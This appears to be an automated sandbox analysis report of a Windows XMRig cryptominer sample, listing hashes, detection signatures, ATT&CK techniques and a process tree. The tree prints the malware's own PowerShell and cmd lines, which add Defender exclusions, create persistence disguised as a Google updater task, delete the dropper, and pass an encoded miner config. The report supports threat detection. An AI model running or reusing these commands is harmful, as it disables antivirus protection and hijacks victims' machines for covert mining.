Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    413s
  • max time network
    1805s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/6aNn9vLJCQVfagSE.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1244
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6aNn9vLJCQVfagSE.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6aNn9vLJCQVfagSE.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2400
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2940
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6aNn9vLJCQVfagSE.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:2780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2836
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:2576
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:472
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:700
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:1640
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              • Modifies data under HKEY_USERS
              • Suspicious use of AdjustPrivilegeToken
              PID:288
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1676
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2804
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {C24664D2-B483-4F86-80A2-B1FDAB9AB806} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2600
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3032

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          98KB

          MD5

          a4a5e4b22c1295fa04deb4e0fa607938

          SHA1

          7287bb410f28ee3777838ac3dfccfa06e4bb2b8d

          SHA256

          eac475b41eef70c1b1a297c4ca2514f364731b395f259b30f68ed96755ee680e

          SHA512

          2434079d869784903035b254fb170d5ac128cf8f5c3d20c0b6c2feb10817213cf075c13107153075354cbddcfa105da873720e76b34b1e3f487957349d86d302

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          2.0MB

          MD5

          a16a669a09bf158058b83e04e69fe38e

          SHA1

          f6c94763850d9e590d86057139e8895a7aacdeea

          SHA256

          cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

          SHA512

          658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          4317a04cd25874edbe880db8d19cef3c

          SHA1

          2f66a2a3c6468966fdbd096de624a4c6ac174150

          SHA256

          6052d2953384c754a80107706e366956591f82427b8222de84bab25ed5d40d18

          SHA512

          e630ab5434d291469921f01b97443fad9dbcec2ebeda4234b2c3f0da9d0243e0e568a3f477fa7a6fd5c1e66184620d58356266ebc5c2c747d087021280adabda

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          195KB

          MD5

          715416dc5f4942330787f437468b32a6

          SHA1

          8b7b664069a81e87f887bfc4e803218162ef7327

          SHA256

          3afda9fb75b8fdf11e6f52302cce5b39f2ccdccccc1f17610968057df4fb9f0d

          SHA512

          fe39512b142170148a081b9c6c82c2938dc7781bd1b55fe622e86eb326878362a521941b722a0e1952b1cf6825ffceafddf2d93d2d8d4ec0a356990082fccd81

        • memory/700-76-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/700-72-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2004-54-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2004-56-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2004-57-0x0000000001140000-0x00000000011C0000-memory.dmp
          Filesize

          512KB

        • memory/2004-60-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2004-59-0x0000000001140000-0x00000000011C0000-memory.dmp
          Filesize

          512KB

        • memory/2004-58-0x0000000001140000-0x00000000011C0000-memory.dmp
          Filesize

          512KB

        • memory/2004-55-0x0000000001140000-0x00000000011C0000-memory.dmp
          Filesize

          512KB

        • memory/2400-27-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp
          Filesize

          9.6MB

        • memory/2400-22-0x0000000002300000-0x0000000002380000-memory.dmp
          Filesize

          512KB

        • memory/2400-25-0x0000000002300000-0x0000000002380000-memory.dmp
          Filesize

          512KB

        • memory/2400-26-0x0000000002300000-0x0000000002380000-memory.dmp
          Filesize

          512KB

        • memory/2400-23-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp
          Filesize

          9.6MB

        • memory/2400-20-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp
          Filesize

          9.6MB

        • memory/2400-21-0x00000000022D0000-0x00000000022D8000-memory.dmp
          Filesize

          32KB

        • memory/2400-24-0x0000000002300000-0x0000000002380000-memory.dmp
          Filesize

          512KB

        • memory/2400-19-0x000000001B140000-0x000000001B422000-memory.dmp
          Filesize

          2.9MB

        • memory/2472-53-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp
          Filesize

          9.6MB

        • memory/2472-51-0x0000000001130000-0x00000000011B0000-memory.dmp
          Filesize

          512KB

        • memory/2472-49-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp
          Filesize

          9.6MB

        • memory/2472-48-0x0000000001130000-0x00000000011B0000-memory.dmp
          Filesize

          512KB

        • memory/2472-50-0x0000000001130000-0x00000000011B0000-memory.dmp
          Filesize

          512KB

        • memory/2472-52-0x0000000001130000-0x00000000011B0000-memory.dmp
          Filesize

          512KB

        • memory/2472-47-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp
          Filesize

          9.6MB

        • memory/2804-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-132-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-130-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-64-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-65-0x00000000000B0000-0x00000000000D0000-memory.dmp
          Filesize

          128KB

        • memory/2804-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-71-0x0000000000830000-0x0000000000850000-memory.dmp
          Filesize

          128KB

        • memory/2804-70-0x00000000001F0000-0x0000000000210000-memory.dmp
          Filesize

          128KB

        • memory/2804-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-80-0x0000000000830000-0x0000000000850000-memory.dmp
          Filesize

          128KB

        • memory/2804-79-0x00000000001F0000-0x0000000000210000-memory.dmp
          Filesize

          128KB

        • memory/2804-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2804-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2836-41-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2836-40-0x0000000002890000-0x0000000002910000-memory.dmp
          Filesize

          512KB

        • memory/2836-39-0x0000000002890000-0x0000000002910000-memory.dmp
          Filesize

          512KB

        • memory/2836-38-0x0000000002890000-0x0000000002910000-memory.dmp
          Filesize

          512KB

        • memory/2836-37-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2836-35-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2836-36-0x0000000002890000-0x0000000002910000-memory.dmp
          Filesize

          512KB

        • memory/2932-29-0x000000013F070000-0x000000013F281000-memory.dmp
          Filesize

          2.1MB

        • memory/2932-0-0x000000013F070000-0x000000013F281000-memory.dmp
          Filesize

          2.1MB

        • memory/2972-8-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2972-12-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2972-13-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2972-11-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2972-10-0x00000000025B0000-0x0000000002630000-memory.dmp
          Filesize

          512KB

        • memory/2972-9-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2972-7-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp
          Filesize

          9.6MB

        • memory/2972-6-0x0000000002350000-0x0000000002358000-memory.dmp
          Filesize

          32KB

        • memory/2972-5-0x000000001B1E0000-0x000000001B4C2000-memory.dmp
          Filesize

          2.9MB

        • memory/3032-66-0x000000013FBE0000-0x000000013FDF1000-memory.dmp
          Filesize

          2.1MB

        • memory/3032-45-0x000000013FBE0000-0x000000013FDF1000-memory.dmp
          Filesize

          2.1MB